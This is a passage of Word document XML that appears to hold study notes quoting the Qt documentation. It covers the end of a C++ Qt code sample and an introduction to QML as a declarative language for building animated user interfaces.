          <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:after="120"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>return</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pln"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> app</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="kwd"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFF55"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>exec</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>();</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CA76F2" w:rsidRPr="00CA76F2" w:rsidRDefault="00CA76F2" w:rsidP="00CA76F2">
            <w:pPr>
              <w:pStyle w:val="HTML0"/>
              <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
              <w:spacing w:after="120"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CA76F2">
              <w:rPr>
                <w:rStyle w:val="pun"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:i/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CA76F2" w:rsidRPr="00CF5106" w:rsidRDefault="00490E7E" w:rsidP="00CA76F2">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2949" w:history="1">
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>://</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>doc</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>io</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qt</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>-5/</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>qmlapplications</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidR="00064AC7" w:rsidRPr="008F7E48">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2650" w:name="_Toc483001110"/>
      <w:bookmarkStart w:id="2651" w:name="_Toc483004079"/>
      <w:bookmarkStart w:id="2652" w:name="_Toc483604443"/>
      <w:bookmarkStart w:id="2653" w:name="_Toc483605663"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML Applications</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2650"/>
      <w:bookmarkEnd w:id="2651"/>
      <w:bookmarkEnd w:id="2652"/>
      <w:bookmarkEnd w:id="2653"/>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 xml:space="preserve">QML is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>declarative language</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows user interfaces to be described in terms of their visual components and how they interact and relate with one another</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly readable language</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that was </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>designed to enable components to be interconnected in a dynamic manner</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows components to be easily reused and customized within a user interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Using the</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, designers and developers can </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>easily build fluid animated user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in QML, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>have the option of connecting these user interfaces to any back-end C++ libraries</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2654" w:name="what-is-qml"/>
      <w:bookmarkStart w:id="2655" w:name="_Toc483001111"/>
      <w:bookmarkStart w:id="2656" w:name="_Toc483004080"/>
      <w:bookmarkStart w:id="2657" w:name="_Toc483604444"/>
      <w:bookmarkStart w:id="2658" w:name="_Toc483605664"/>
      <w:bookmarkEnd w:id="2654"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What is QML?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2655"/>
      <w:bookmarkEnd w:id="2656"/>
      <w:bookmarkEnd w:id="2657"/>
      <w:bookmarkEnd w:id="2658"/>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00C10CB8" w:rsidP="00C10CB8">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">QML is a user </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface specification and programming language</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It allows developers and designers alike </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to create highly performant, fluidly animated and visually appealing applications</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. QML offers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>highly readable, declarative, JSON-like syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>support for imperative JavaScript expressions</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>combined with dynamic property bindings</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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 xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML language</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>engine infrastructure</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is provided by the</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2950" w:history="1">
        <w:r w:rsidRPr="00C83331">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For in-depth information about the QML language, please see the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2951" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> module documentation.</w:t>
      </w:r>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The following pages contain more information about QML:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2952" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>First Steps with QML</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
